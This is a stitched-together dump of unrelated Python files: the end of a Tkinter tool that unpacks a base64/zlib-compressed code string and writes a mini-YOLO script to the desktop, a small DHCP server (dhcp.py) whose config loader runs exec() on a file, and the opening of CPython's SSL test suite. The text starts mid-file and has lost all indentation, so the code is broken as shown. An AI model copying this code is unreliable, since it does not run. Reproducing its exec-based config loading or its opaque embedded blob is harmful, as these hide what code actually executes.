'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'
)
# len(zstring): 3684
import base64, zlib
zstring = base64.b64decode(zstring)
zstring = zlib.decompress(zstring,-15)
string = zstring.decode("utf-8")
testpath = fpic0095ent1.get().strip()
if not testpath:
print('没有指定测试文件路径。')
return
testpath = repr(testpath)
code = string+'''
if __name__ == '__main__':
state = load_net('net.pkl')
for i in os.listdir({}):
if i.endswith('jpg'):
print(i)
get_all_draw_rects(os.path.join({}, i), state)
'''.format(testpath, testpath)
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。\n(存放到桌面)')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(code)
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
Button(fpic0093, text='加载数据',command=_load_voc_data,width=16).pack(side=tkinter.RIGHT)
Button(fpic0094, text='开始训练',command=_pytrain_mini_yolo,width=16).pack(side=tkinter.RIGHT)
Button(fpic0095, text='停止训练',command=_pystoptrain_mini_yolo,width=16).pack(side=tkinter.RIGHT)
Button(fpic0096, text='测试数据',command=_test_mini_yolo_data,width=16).pack(side=tkinter.RIGHT)
Button(fpic0097, text='生成使用代码',command=_create_use_mini_yolo_code,width=16).pack(side=tkinter.RIGHT)
Button(fpic0092, text='[算法]',command=_pymini_yolo_code,width=5).pack(side=tkinter.LEFT)
# Label(fpic0093, text='voc数据集地址').pack(side=tkinter.LEFT)
Button(fpic0093, text='[打开文件] voc数据集地址: ',command=_set_train_file_dir).pack(side=tkinter.LEFT)
fpic009ent1 = Entry(fpic0093,width=40)
fpic009ent1.pack(side=tkinter.RIGHT)
desktoppath = os.path.join(os.path.expanduser("~"),'Desktop')
Button(fpic0094, text='[打开文件] 模型存放地址: ',command=_save_train_model_dir).pack(side=tkinter.LEFT)
fpic0094ent1 = Entry(fpic0094,width=40)
fpic0094ent1.insert(tkinter.END, desktoppath)
fpic0094ent1.pack(side=tkinter.RIGHT)
Button(fpic0095, text='[打开文件] 测试数据(默认测5张): ',command=_save_test_model_dir).pack(side=tkinter.LEFT)
fpic0095ent1 = Entry(fpic0095,width=40)
fpic0095ent1.pack(side=tkinter.RIGHT)
Label(fpic0092, text='EPOCH').pack(side=tkinter.LEFT)
fpic0092ent1 = Entry(fpic0092,width=5)
fpic0092ent1.pack(side=tkinter.LEFT)
fpic0092ent1.insert(tkinter.END, '1000')
Label(fpic0092, text='BATCH_SIZE').pack(side=tkinter.LEFT)
fpic0092ent2 = Entry(fpic0092,width=4)
fpic0092ent2.pack(side=tkinter.LEFT)
fpic0092ent2.insert(tkinter.END, '4')
Label(fpic0092, text='LR').pack(side=tkinter.LEFT)
fpic0092ent3 = Entry(fpic0092,width=7)
fpic0092ent3.pack(side=tkinter.LEFT)
fpic0092ent3.insert(tkinter.END, '0.001')
Label(fpic0092, text='anchors').pack(side=tkinter.LEFT)
fpic0092ent4 = Entry(fpic0092,width=20)
fpic0092ent4.pack(side=tkinter.LEFT)
fpic0092ent4.insert(tkinter.END, '[[60, 60]]')
# Label(fpic0093, text=' 背景图片,不填则默认桌面').pack(side=tkinter.LEFT)
return fr # 开发时注意将该处放在该函数的最后部分
if __name__ == '__main__':
# test frame
fr = encode_window()
fr.title('命令行输入 vv e 则可快速打开便捷加密窗口')
sys.stdout = __org_stdout__
fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit())
fr.master.withdraw()
fr.mainloop()
|
dhcp.py
|
#!/usr/bin/python3
import time
import threading
import struct
import queue
import collections
import traceback
import random
import socket
from listener import *
def get_host_ip_addresses():
return gethostbyname_ex(gethostname())[2]
class WriteBootProtocolPacket(object):
message_type = 2 # 1 for client -> server 2 for server -> client
hardware_type = 1
hardware_address_length = 6
hops = 0
transaction_id = None
seconds_elapsed = 0
bootp_flags = 0 # unicast
client_ip_address = '0.0.0.0'
your_ip_address = '0.0.0.0'
next_server_ip_address = '0.0.0.0'
relay_agent_ip_address = '0.0.0.0'
client_mac_address = None
magic_cookie = '99.130.83.99'
parameter_order = []
def __init__(self, configuration):
for i in range(256):
names = ['option_{}'.format(i)]
if i < len(options) and hasattr(configuration, options[i][0]):
names.append(options[i][0])
for name in names:
if hasattr(configuration, name):
setattr(self, name, getattr(configuration, name))
def to_bytes(self):
result = bytearray(236)
result[0] = self.message_type
result[1] = self.hardware_type
result[2] = self.hardware_address_length
result[3] = self.hops
result[4:8] = struct.pack('>I', self.transaction_id)
result[ 8:10] = shortpack(self.seconds_elapsed)
result[10:12] = shortpack(self.bootp_flags)
result[12:16] = inet_aton(self.client_ip_address)
result[16:20] = inet_aton(self.your_ip_address)
result[20:24] = inet_aton(self.next_server_ip_address)
result[24:28] = inet_aton(self.relay_agent_ip_address)
result[28:28 + self.hardware_address_length] = macpack(self.client_mac_address)
result += inet_aton(self.magic_cookie)
for option in self.options:
value = self.get_option(option)
#print(option, value)
if value is None:
continue
result += bytes([option, len(value)]) + value
result += bytes([255])
return bytes(result)
def get_option(self, option):
if option < len(options) and hasattr(self, options[option][0]):
value = getattr(self, options[option][0])
elif hasattr(self, 'option_{}'.format(option)):
value = getattr(self, 'option_{}'.format(option))
else:
return None
function = options[option][2]
if function and value is not None:
value = function(value)
return value
@property
def options(self):
done = list()
# fulfill wishes
for option in self.parameter_order:
if option < len(options) and hasattr(self, options[option][0]) or hasattr(self, 'option_{}'.format(option)):
# this may break with the specification because we must try to fulfill the wishes
if option not in done:
done.append(option)
# add my stuff
for option, o in enumerate(options):
if o[0] and hasattr(self, o[0]):
if option not in done:
done.append(option)
for option in range(256):
if hasattr(self, 'option_{}'.format(option)):
if option not in done:
done.append(option)
return done
def __str__(self):
return str(ReadBootProtocolPacket(self.to_bytes()))
class DelayWorker(object):
def __init__(self):
self.closed = False
self.queue = queue.PriorityQueue()
self.thread = threading.Thread(target = self._delay_response_thread)
self.thread.start()
def _delay_response_thread(self):
while not self.closed:
if self.closed:
break
if not self.queue.empty():
p = self.queue.get()
t, func, args, kw = p
now = time.time()
if now < t:
time.sleep(0.01)
self.queue.put(p)
else:
func(*args, **kw)
def do_after(self, seconds, func, args = (), kw = {}):
self.queue.put((time.time() + seconds, func, args, kw))
def close(self):
self.closed = True
class Transaction(object):
def __init__(self, server):
self.server = server
self.configuration = server.configuration
self.packets = []
self.done_time = time.time() + self.configuration.length_of_transaction
self.done = False
self.do_after = self.server.delay_worker.do_after
def is_done(self):
return self.done or self.done_time < time.time()
def close(self):
self.done = True
def receive(self, packet):
# packet from client <-> packet.message_type == 1
if packet.message_type == 1 and packet.dhcp_message_type == 'DHCPDISCOVER':
self.do_after(self.configuration.dhcp_offer_after_seconds,
self.received_dhcp_discover, (packet,), )
elif packet.message_type == 1 and packet.dhcp_message_type == 'DHCPREQUEST':
self.do_after(self.configuration.dhcp_acknowledge_after_seconds,
self.received_dhcp_request, (packet,), )
elif packet.message_type == 1 and packet.dhcp_message_type == 'DHCPINFORM':
self.received_dhcp_inform(packet)
else:
return False
return True
def received_dhcp_discover(self, discovery):
if self.is_done(): return
self.configuration.debug('discover:\n {}'.format(str(discovery).replace('\n', '\n\t')))
self.send_offer(discovery)
def send_offer(self, discovery):
# https://tools.ietf.org/html/rfc2131
offer = WriteBootProtocolPacket(self.configuration)
offer.parameter_order = discovery.parameter_request_list
mac = discovery.client_mac_address
ip = offer.your_ip_address = self.server.get_ip_address(discovery)
# offer.client_ip_address =
offer.transaction_id = discovery.transaction_id
# offer.next_server_ip_address =
offer.relay_agent_ip_address = discovery.relay_agent_ip_address
offer.client_mac_address = mac
offer.client_ip_address = discovery.client_ip_address or '0.0.0.0'
offer.bootp_flags = discovery.bootp_flags
offer.dhcp_message_type = 'DHCPOFFER'
offer.client_identifier = mac
self.server.broadcast(offer)
def received_dhcp_request(self, request):
if self.is_done(): return
self.server.client_has_chosen(request)
self.acknowledge(request)
self.close()
def acknowledge(self, request):
ack = WriteBootProtocolPacket(self.configuration)
ack.parameter_order = request.parameter_request_list
ack.transaction_id = request.transaction_id
# ack.next_server_ip_address =
ack.bootp_flags = request.bootp_flags
ack.relay_agent_ip_address = request.relay_agent_ip_address
mac = request.client_mac_address
ack.client_mac_address = mac
requested_ip_address = request.requested_ip_address
ack.client_ip_address = request.client_ip_address or '0.0.0.0'
ack.your_ip_address = self.server.get_ip_address(request)
ack.dhcp_message_type = 'DHCPACK'
self.server.broadcast(ack)
def received_dhcp_inform(self, inform):
self.close()
self.server.client_has_chosen(inform)
class DHCPServerConfiguration(object):
dhcp_offer_after_seconds = 10
dhcp_acknowledge_after_seconds = 10
length_of_transaction = 40
network = '192.168.173.0'
broadcast_address = '255.255.255.255'
subnet_mask = '255.255.255.0'
router = None # list of ips
# 1 day is 86400
ip_address_lease_time = 300 # seconds
domain_name_server = None # list of ips
host_file = 'hosts.csv'
debug = lambda *args, **kw: None
def load(self, file):
with open(file) as f:
exec(f.read(), self.__dict__)
def adjust_if_this_computer_is_a_router(self):
ip_addresses = get_host_ip_addresses()
for ip in reversed(ip_addresses):
if ip.split('.')[-1] == '1':
self.router = [ip]
self.domain_name_server = [ip]
self.network = '.'.join(ip.split('.')[:-1] + ['0'])
self.broadcast_address = '.'.join(ip.split('.')[:-1] + ['255'])
#self.ip_forwarding_enabled = True
#self.non_local_source_routing_enabled = True
#self.perform_mask_discovery = True
def all_ip_addresses(self):
ips = ip_addresses(self.network, self.subnet_mask)
for i in range(5):
next(ips)
return ips
def network_filter(self):
return NETWORK(self.network, self.subnet_mask)
def ip_addresses(network, subnet_mask):
import socket, struct
subnet_mask = struct.unpack('>I', socket.inet_aton(subnet_mask))[0]
network = struct.unpack('>I', socket.inet_aton(network))[0]
network = network & subnet_mask
start = network + 1
end = (network | (~subnet_mask & 0xffffffff))
return (socket.inet_ntoa(struct.pack('>I', i)) for i in range(start, end))
class ALL(object):
def __eq__(self, other):
return True
def __repr__(self):
return self.__class__.__name__
ALL = ALL()
class GREATER(object):
def __init__(self, value):
self.value = value
def __eq__(self, other):
return type(self.value)(other) > self.value
class NETWORK(object):
def __init__(self, network, subnet_mask):
self.subnet_mask = struct.unpack('>I', inet_aton(subnet_mask))[0]
self.network = struct.unpack('>I', inet_aton(network))[0]
def __eq__(self, other):
ip = struct.unpack('>I', inet_aton(other))[0]
return ip & self.subnet_mask == self.network and \
ip - self.network and \
ip - self.network != ~self.subnet_mask & 0xffffffff
class CASEINSENSITIVE(object):
def __init__(self, s):
self.s = s.lower()
def __eq__(self, other):
return self.s == other.lower()
class CSVDatabase(object):
delimiter = ';'
def __init__(self, file_name):
self.file_name = file_name
self.file('a').close() # create file
def file(self, mode = 'r'):
return open(self.file_name, mode)
def get(self, pattern):
pattern = list(pattern)
return [line for line in self.all() if pattern == line]
def add(self, line):
with self.file('a') as f:
f.write(self.delimiter.join(line) + '\n')
def delete(self, pattern):
lines = self.all()
lines_to_delete = self.get(pattern)
self.file('w').close() # empty file
for line in lines:
if line not in lines_to_delete:
self.add(line)
def all(self):
with self.file() as f:
return [list(line.strip().split(self.delimiter)) for line in f]
class Host(object):
def __init__(self, mac, ip, hostname, last_used):
self.mac = mac.upper()
self.ip = ip
self.hostname = hostname
self.last_used = int(last_used)
@classmethod
def from_tuple(cls, line):
mac, ip, hostname, last_used = line
last_used = int(last_used)
return cls(mac, ip, hostname, last_used)
@classmethod
def from_packet(cls, packet):
return cls(packet.client_mac_address,
packet.requested_ip_address or packet.client_ip_address,
packet.host_name or '',
int(time.time()))
@staticmethod
def get_pattern(mac = ALL, ip = ALL, hostname = ALL, last_used = ALL):
return [mac, ip, hostname, last_used]
def to_tuple(self):
return [self.mac, self.ip, self.hostname, str(int(self.last_used))]
def to_pattern(self):
return self.get_pattern(ip = self.ip, mac = self.mac)
def __hash__(self):
return hash(self.key)
def __eq__(self, other):
return self.to_tuple() == other.to_tuple()
def has_valid_ip(self):
return self.ip and self.ip != '0.0.0.0'
class HostDatabase(object):
def __init__(self, file_name):
self.db = CSVDatabase(file_name)
def get(self, **kw):
pattern = Host.get_pattern(**kw)
return list(map(Host.from_tuple, self.db.get(pattern)))
def add(self, host):
self.db.add(host.to_tuple())
def delete(self, host = None, **kw):
if host is None:
pattern = Host.get_pattern(**kw)
else:
pattern = host.to_pattern()
self.db.delete(pattern)
def all(self):
return list(map(Host.from_tuple, self.db.all()))
def replace(self, host):
self.delete(host)
self.add(host)
def sorted_hosts(hosts):
hosts = list(hosts)
hosts.sort(key = lambda host: (host.hostname.lower(), host.mac.lower(), host.ip.lower()))
return hosts
class DHCPServer(object):
def __init__(self, configuration = None):
if configuration == None:
configuration = DHCPServerConfiguration()
self.configuration = configuration
self.socket = socket(type = SOCK_DGRAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.socket.bind(('', 67))
self.delay_worker = DelayWorker()
self.closed = False
self.transactions = collections.defaultdict(lambda: Transaction(self)) # id: transaction
self.hosts = HostDatabase(self.configuration.host_file)
self.time_started = time.time()
def close(self):
self.socket.close()
self.closed = True
self.delay_worker.close()
for transaction in list(self.transactions.values()):
transaction.close()
def update(self, timeout = 0):
try:
reads = select.select([self.socket], [], [], timeout)[0]
except ValueError:
# ValueError: file descriptor cannot be a negative integer (-1)
return
for socket in reads:
try:
packet = ReadBootProtocolPacket(*socket.recvfrom(4096))
except OSError:
# OSError: [WinError 10038] An operation was attempted on something that is not a socket
pass
else:
self.received(packet)
for transaction_id, transaction in list(self.transactions.items()):
if transaction.is_done():
transaction.close()
self.transactions.pop(transaction_id)
def received(self, packet):
if not self.transactions[packet.transaction_id].receive(packet):
self.configuration.debug('received:\n {}'.format(str(packet).replace('\n', '\n\t')))
def client_has_chosen(self, packet):
self.configuration.debug('client_has_chosen:\n {}'.format(str(packet).replace('\n', '\n\t')))
host = Host.from_packet(packet)
if not host.has_valid_ip():
return
self.hosts.replace(host)
def is_valid_client_address(self, address):
if address is None:
return False
a = address.split('.')
s = self.configuration.subnet_mask.split('.')
n = self.configuration.network.split('.')
return all(s[i] == '0' or a[i] == n[i] for i in range(4))
def get_ip_address(self, packet):
mac_address = packet.client_mac_address
requested_ip_address = packet.requested_ip_address
known_hosts = self.hosts.get(mac = CASEINSENSITIVE(mac_address))
ip = None
if known_hosts:
# 1. choose known ip address
for host in known_hosts:
if self.is_valid_client_address(host.ip):
ip = host.ip
print('known ip:', ip)
if ip is None and self.is_valid_client_address(requested_ip_address):
# 2. choose valid requested ip address
ip = requested_ip_address
print('valid ip:', ip)
if ip is None:
# 3. choose new, free ip address
chosen = False
network_hosts = self.hosts.get(ip = self.configuration.network_filter())
for ip in self.configuration.all_ip_addresses():
if not any(host.ip == ip for host in network_hosts):
chosen = True
break
if not chosen:
# 4. reuse old valid ip address
network_hosts.sort(key = lambda host: host.last_used)
ip = network_hosts[0].ip
assert self.is_valid_client_address(ip)
print('new ip:', ip)
if not any([host.ip == ip for host in known_hosts]):
print('add', mac_address, ip, packet.host_name)
self.hosts.replace(Host(mac_address, ip, packet.host_name or '', time.time()))
return ip
@property
def server_identifiers(self):
return get_host_ip_addresses()
def broadcast(self, packet):
self.configuration.debug('broadcasting:\n {}'.format(str(packet).replace('\n', '\n\t')))
for addr in self.server_identifiers:
broadcast_socket = socket(type = SOCK_DGRAM)
broadcast_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
broadcast_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
packet.server_identifier = addr
broadcast_socket.bind((addr, 67))
try:
data = packet.to_bytes()
broadcast_socket.sendto(data, ('255.255.255.255', 68))
broadcast_socket.sendto(data, (addr, 68))
finally:
broadcast_socket.close()
def run(self):
while not self.closed:
try:
self.update(1)
except KeyboardInterrupt:
break
except:
traceback.print_exc()
def run_in_thread(self):
thread = threading.Thread(target = self.run)
thread.start()
return thread
def debug_clients(self):
for line in self.ips.all():
line = '\t'.join(line)
if line:
self.configuration.debug(line)
def get_all_hosts(self):
return sorted_hosts(self.hosts.get())
def get_current_hosts(self):
return sorted_hosts(self.hosts.get(last_used = GREATER(self.time_started)))
if __name__ == '__main__':
configuration = DHCPServerConfiguration()
configuration.debug = print
configuration.adjust_if_this_computer_is_a_router()
configuration.router #+= ['192.168.0.1']
configuration.ip_address_lease_time = 60
server = DHCPServer(configuration)
for ip in server.configuration.all_ip_addresses():
assert ip == server.configuration.network_filter()
server.run()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
